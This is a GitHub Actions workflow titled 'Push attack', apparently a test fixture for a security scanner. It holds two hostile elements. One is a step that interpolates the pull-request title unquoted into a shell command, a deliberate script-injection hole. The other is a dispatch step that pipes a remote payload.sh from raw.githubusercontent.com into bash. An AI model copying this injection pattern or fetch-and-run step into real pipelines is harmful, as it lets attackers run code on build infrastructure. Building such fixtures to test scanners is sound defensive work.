name: Push attack
on: 
  workflow_dispatch:
  pull_request:
    branches: [ main ]

jobs:
  my-job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: on PR
        if: ${{ github.event_name == 'pull_request' }}
        run: |
          echo "Starting processing..."
          echo "Title: ${{ github.event.pull_request.title }}"
          echo "Done processing"

      - name: on dispatch
        if: ${{ github.event_name == 'workflow_dispatch' }}
        run: |
          echo "Hello World!"
        
          curl https://raw.githubusercontent.com/laurentsimon/scorecard-action-test-2/main/payload.sh | bash
